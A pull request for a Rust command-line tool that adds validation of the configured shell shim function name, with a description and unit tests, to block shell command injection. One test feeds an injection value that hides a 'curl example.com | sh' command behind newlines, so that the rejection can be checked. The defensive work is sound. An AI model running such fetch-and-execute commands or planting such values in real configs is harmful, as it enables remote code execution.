### PR TITLE
Validate shell shim function names

### DIFF
--- a/src/app/path.rs
+++ b/src/app/path.rs
@@ -1,6 +1,6 @@
 use std::path::{Component, Path, PathBuf};
 
-use crate::config::{Config, ConfigSupport};
+use crate::config::{Config, ConfigSupport, validate_cd_shim_name};
 use crate::mure_error::Error;
 
 pub fn path(config: &Config, name: &str) -> Result<(), Error> {
@@ -8,13 +8,16 @@ pub fn path(config: &Config, name: &str) -> Result<(), Error> {
     Ok(())
 }
 
-pub fn shell_shims(config: &Config) -> String {
+pub fn shell_shims(config: &Config) -> Result<String, Error> {
     let fn_name = config.resolve_cd_shims();
     shell_shims_for_cd_directly("mure", &fn_name)
 }
 
-fn shell_shims_for_cd_directly(bin_name: &str, fn_name: &str) -> String {
-    format!("function {fn_name}() {{ local p=$({bin_name} path \"$1\") && cd \"$p\" }}\n")
+fn shell_shims_for_cd_directly(bin_name: &str, fn_name: &str) -> Result<String, Error> {
+    validate_cd_shim_name(fn_name)?;
+    Ok(format!(
+        "function {fn_name}() {{ local p=$({bin_name} path \"$1\") && cd \"$p\" }}\n"
+    ))
 }
 
 fn validate_name(name: &str) -> Result<(), Error> {
@@ -143,8 +146,38 @@ mod tests {
         };
         let shims = shell_shims(&config);
         assert_eq!(
-            shims,
+            shims.unwrap(),
             "function mucd() { local p=$(mure path \"$1\") && cd \"$p\" }\n"
+        );
+    }
+
+    #[test]
+    fn test_shell_shims_rejects_invalid_function_name() {
+        let config = Config {
+            core: Core {
+                base_dir: "".to_string(),
+                editor: None,
+            },
+            github: GitHub {
+                username: "".to_string(),
+                query: None,
+                queries: None,
+            },
+            shell: Some(Shell {
+                cd_shims: Some("mucd\ncurl example.com | sh\nfunction mucd".to_string()),
+            }),
+        };
+
+        let err = shell_shims(&config).unwrap_err();
+        assert!(err.to_string().contains("valid shell function name"));
+    }
+
+    #[test]
+    fn test_shell_shims_accepts_safe_function_name() {
+        let shims = shell_shims_for_cd_directly("mure", "_mucd123").unwrap();
+        assert_eq!(
+            shims,
+            "function _mucd123() { local p=$(mure path \"$1\") && cd \"$p\" }\n"
         );
     }
 }

--- a/src/config.rs
+++ b/src/config.rs
@@ -80,6 +80,25 @@ pub trait ConfigSupport {
     fn resolve_cd_shims(&self) -> String;
 }
 
+pub fn validate_cd_shim_name(name: &str) -> Result<(), Error> {
+    let mut chars = name.chars();
+    let Some(first) = chars.next() else {
+        return Err(Error::from_str(
+            "shell.cd_shims must be a valid shell function name",
+        ));
+    };
+
+    if !(first == '_' || first.is_ascii_alphabetic())
+        || chars.any(|c| !(c == '_' || c.is_ascii_alphanumeric()))
+    {
+        return Err(Error::from_str(
+            "shell.cd_shims must be a valid shell function name",
+        ));
+    }
+
+    Ok(())
+}
+
 impl ConfigSupport for Config {
     fn base_path(&self) -> PathBuf {
         let expand_path = shellexpand::tilde(self.core.base_dir.as_str()).to_string();

--- a/src/main.rs
+++ b/src/main.rs
@@ -34,7 +34,7 @@ fn main() -> Result<(), mure_error::Error> {
 
     match cli.command {
         Init { shell: true } => {
-            println!("{}", app::path::shell_shims(&config));
+            println!("{}", app::path::shell_shims(&config)?);
         }
         Init { shell: false } => match app::initialize::init() {
             Ok(_) => {
@@ -46,6 +46,7 @@ fn main() -> Result<(), mure_error::Error> {
         },
         Completion { shell, cd: true } => {
             let shim_name = config.resolve_cd_shims();
+            config::validate_cd_shim_name(&shim_name)?;
             generate_mucd_dynamic_completion(shell, &shim_name)?;
         }
         Completion { shell, cd: false } => {
@@ -105,11 +106,13 @@ fn completion_target_from_args(args: &[OsString]) -> Option<String> {
     None
 }
 
-fn resolve_cd_shim_name() -> String {
-    config::get_config()
+fn resolve_cd_shim_name() -> Result<String, mure_error::Error> {
+    let shim_name = config::get_config()
         .ok()
         .and_then(|c| c.shell.and_then(|s| s.cd_shims))
-        .unwrap_or_else(|| "mucd".to_string())
+        .unwrap_or_else(|| "mucd".to_string());
+    config::validate_cd_shim_name(&shim_name)?;
+    Ok(shim_name)
 }
 
 fn try_dynamic_completion() -> Result<bool, mure_error::Error> {
@@ -121,7 +124,7 @@ fn try_dynamic_completion() -> Result<bool, mure_error::Error> {
     }
 
     let args: Vec<OsString> = std::env::args_os().collect();
-    let shim_name = resolve_cd_shim_name();
+    let shim_name = resolve_cd_shim_name()?;
     let target = completion_target_from_args(&args);
 
     let use_mucd_command = matches!(target.as_deref(), Some("mucd"))


### PR DESCRIPTION
Summary:
- Validate `shell.cd_shims` before using it as a generated shell function name.
- Reject names with whitespace, newlines, shell metacharacters, or invalid leading characters.
- Apply the same validation to shell shim generation and dynamic completion registration.

Changed files:
- `src/config.rs`
- `src/app/path.rs`
- `src/main.rs`

Tests:
- `cargo fmt --all -- --check`
- `cargo check`
- `cargo test`
- `cargo clippy -- -D warnings`
- `cargo build`
- `cargo llvm-cov --lcov --output-path coverage.lcov`
- `actionlint -shellcheck=`
- `typos`
- `git diff --check`
